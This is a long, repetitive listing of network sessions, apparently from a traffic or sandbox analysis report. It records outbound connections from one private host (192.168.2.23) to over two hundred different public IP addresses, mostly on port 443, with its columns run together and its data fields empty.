                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19920192.168.2.235450248.239.122.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19921192.168.2.2354766115.226.56.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19922192.168.2.233819212.239.7.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19923192.168.2.235172613.230.88.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19924192.168.2.2352556195.110.18.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19925192.168.2.233799049.130.150.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19926192.168.2.2350494181.48.103.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19927192.168.2.2351694125.182.4.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19928192.168.2.2350366106.31.20.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19929192.168.2.2354510162.52.10.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19930192.168.2.235042844.103.59.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19931192.168.2.2349304144.219.121.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19932192.168.2.2344572212.152.243.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19933192.168.2.2332938202.130.189.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19934192.168.2.2357294112.154.205.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19935192.168.2.2359710155.103.122.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19936192.168.2.2345218112.136.37.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19937192.168.2.2359824168.86.75.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19938192.168.2.233935452.68.84.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19939192.168.2.2354216209.227.237.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19940192.168.2.235693477.86.47.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19941192.168.2.235385883.130.1.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19942192.168.2.2349684201.19.98.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19943192.168.2.2342320159.236.76.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19944192.168.2.234770453.87.207.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19945192.168.2.233886060.110.51.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19946192.168.2.2353562120.60.94.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19947192.168.2.2337184179.168.160.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19948192.168.2.2337106139.1.247.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19949192.168.2.235156692.203.220.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19950192.168.2.2355618140.242.210.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19951192.168.2.2354860223.14.214.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19952192.168.2.23523748.175.11.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19953192.168.2.2333224150.59.66.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19954192.168.2.2334372119.250.234.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19955192.168.2.2358720196.136.134.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19956192.168.2.2358836190.213.95.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19957192.168.2.2344822186.45.114.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19958192.168.2.234412858.156.79.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19959192.168.2.233822877.213.116.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19960192.168.2.234384057.182.34.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19961192.168.2.235248038.252.72.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19962192.168.2.235886460.13.159.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19963192.168.2.2334036124.143.34.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19964192.168.2.2335580168.130.149.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19965192.168.2.235534493.104.39.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19966192.168.2.233423881.105.111.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19967192.168.2.234318076.66.228.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19968192.168.2.235654670.47.35.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19969192.168.2.2360316132.170.26.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19970192.168.2.235287848.244.6.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19971192.168.2.2336044217.122.0.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19972192.168.2.2338026221.147.191.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19973192.168.2.2339698199.42.80.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19974192.168.2.2346318203.84.226.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19975192.168.2.234124691.229.84.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19976192.168.2.234111889.206.127.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19977192.168.2.2334738162.96.166.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19978192.168.2.233611057.19.45.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19979192.168.2.234818289.233.149.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19980192.168.2.235777864.5.126.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19981192.168.2.233686034.165.220.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19982192.168.2.234931452.116.23.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19983192.168.2.234750052.139.209.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19984192.168.2.234316036.251.49.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19985192.168.2.234562419.230.39.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19986192.168.2.2346630182.253.62.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19987192.168.2.234209432.211.74.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19988192.168.2.2350376119.95.42.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19989192.168.2.2343316100.229.38.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19990192.168.2.235570439.106.137.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19991192.168.2.2338504132.149.193.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19992192.168.2.236078066.215.245.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19993192.168.2.2336966141.9.193.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19994192.168.2.234854495.30.105.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19995192.168.2.234301612.222.99.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19996192.168.2.2351636109.59.96.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19997192.168.2.2360364113.40.59.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19998192.168.2.234032683.29.181.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19999192.168.2.235571436.45.205.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20000192.168.2.233345038.60.200.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20001192.168.2.235609653.60.133.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20002192.168.2.2354326144.218.102.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20003192.168.2.235265283.97.225.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20004192.168.2.234909474.60.97.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20005192.168.2.2336402123.147.242.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20006192.168.2.2359968197.218.131.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20007192.168.2.2344772117.174.8.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20008192.168.2.234506453.141.222.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20009192.168.2.234642048.247.84.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20010192.168.2.235644637.9.221.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20011192.168.2.234953893.194.43.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20012192.168.2.2336630107.36.167.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20013192.168.2.2351050103.26.237.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20014192.168.2.234874087.219.195.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20015192.168.2.2356222134.104.251.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20016192.168.2.2348784149.16.46.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20017192.168.2.2358774171.234.246.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20018192.168.2.233911477.192.98.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20019192.168.2.2342372202.184.49.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20020192.168.2.234711047.1.250.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20021192.168.2.2343578174.116.13.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20022192.168.2.23420522.238.134.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20023192.168.2.2336094174.233.57.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20024192.168.2.2340142137.120.184.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20025192.168.2.234231850.236.238.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20026192.168.2.2354270170.152.116.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20027192.168.2.2357746178.52.236.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20028192.168.2.23478449.97.185.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20029192.168.2.234169871.74.93.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20030192.168.2.2357626218.94.205.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20031192.168.2.2333006205.185.117.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20032192.168.2.2350456117.26.84.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20033192.168.2.235824241.114.174.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20034192.168.2.2349058190.129.64.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20035192.168.2.2334732194.75.195.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20036192.168.2.2349966164.173.144.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20037192.168.2.235447475.140.243.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20038192.168.2.2353686110.54.236.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20039192.168.2.23541604.40.153.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20040192.168.2.234870072.109.35.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20041192.168.2.2349446117.95.239.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20042192.168.2.2340574142.204.125.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20043192.168.2.2360074136.228.118.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20044192.168.2.2352884141.238.5.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20045192.168.2.2342226170.0.215.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20046192.168.2.234087271.124.46.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20047192.168.2.2344408154.97.33.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20048192.168.2.2358338209.160.145.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20049192.168.2.2345574136.226.8.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20050192.168.2.2356080100.137.137.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20051192.168.2.2349928112.136.215.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20052192.168.2.233555818.104.236.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20053192.168.2.2357246121.72.32.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20054192.168.2.233629279.116.146.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20055192.168.2.233744053.53.202.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20056192.168.2.233325294.135.184.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20057192.168.2.2334746209.234.237.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20058192.168.2.23521061.174.190.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20059192.168.2.2338396139.111.86.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20060192.168.2.2336868190.10.143.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20061192.168.2.233679097.178.184.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20062192.168.2.234592224.57.135.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20063192.168.2.2343254212.10.236.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20064192.168.2.2336182197.197.54.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20065192.168.2.2342884155.151.142.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20066192.168.2.2351978125.21.153.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20067192.168.2.235326224.211.85.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20068192.168.2.233766218.222.114.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20069192.168.2.2342764145.134.239.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20070192.168.2.234993419.38.205.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20071192.168.2.2352548167.167.225.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20072192.168.2.234241845.244.72.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20073192.168.2.2333082101.238.158.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20074192.168.2.2352510158.143.48.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20075192.168.2.2359100128.90.75.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20076192.168.2.2332880200.38.240.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20077192.168.2.2341708173.108.189.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20078192.168.2.2359902216.70.85.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20079192.168.2.2356622131.236.149.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20080192.168.2.2341510152.130.43.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20081192.168.2.233955698.38.37.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20082192.168.2.2341232174.191.219.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20083192.168.2.235507653.109.117.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20084192.168.2.2357760152.170.254.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20085192.168.2.235468278.242.178.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20086192.168.2.2352482219.123.59.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20087192.168.2.234246462.174.197.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20088192.168.2.234506291.245.177.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20089192.168.2.233646660.217.100.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20090192.168.2.2356366210.62.214.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20091192.168.2.235336669.122.231.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20092192.168.2.234081082.32.203.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20093192.168.2.2333800146.168.92.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20094192.168.2.2357466222.123.142.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20095192.168.2.234477089.8.82.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20096192.168.2.2356140112.132.86.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20097192.168.2.2358594107.170.129.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20098192.168.2.234957637.94.227.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20099192.168.2.2333196192.156.107.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20100192.168.2.2333276172.240.39.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20101192.168.2.2346566207.231.94.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20102192.168.2.235378617.109.121.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20103192.168.2.2337276105.81.164.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20104192.168.2.235742692.178.147.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20105192.168.2.233478098.100.106.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20106192.168.2.235164486.132.174.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20107192.168.2.234310239.27.206.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20108192.168.2.233497050.217.13.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20109192.168.2.2334476158.7.68.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20110192.168.2.234442027.26.192.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20111192.168.2.2340390176.0.248.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20112192.168.2.2335190122.35.239.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20113192.168.2.2334794119.66.29.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20114192.168.2.2336764114.21.100.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20115192.168.2.233464423.1.74.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20116192.168.2.2346356126.198.22.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20117192.168.2.2334588105.70.254.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20118192.168.2.235217079.176.53.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20119192.168.2.2340478136.229.156.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20120192.168.2.234817671.8.39.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20121192.168.2.2354070217.144.72.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20122192.168.2.234428265.184.83.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20123192.168.2.2342186198.92.222.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20124192.168.2.2342736123.232.70.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20125192.168.2.234668644.86.115.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20126192.168.2.235800831.109.92.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20127192.168.2.234472212.49.233.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20128192.168.2.233971274.175.75.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20129192.168.2.2355510217.11.231.1878080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20130192.168.2.2337812166.96.161.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20131192.168.2.2355344175.28.59.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20132192.168.2.2355282132.123.98.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20133192.168.2.2338630100.163.93.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20134192.168.2.234281070.87.8.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20135192.168.2.2358364198.193.253.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20136192.168.2.2334370151.175.16.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20137192.168.2.234026437.60.61.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20138192.168.2.23534745.13.55.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20139192.168.2.2332862185.63.222.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20140192.168.2.2351474213.193.121.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20141192.168.2.2352958166.166.84.209443
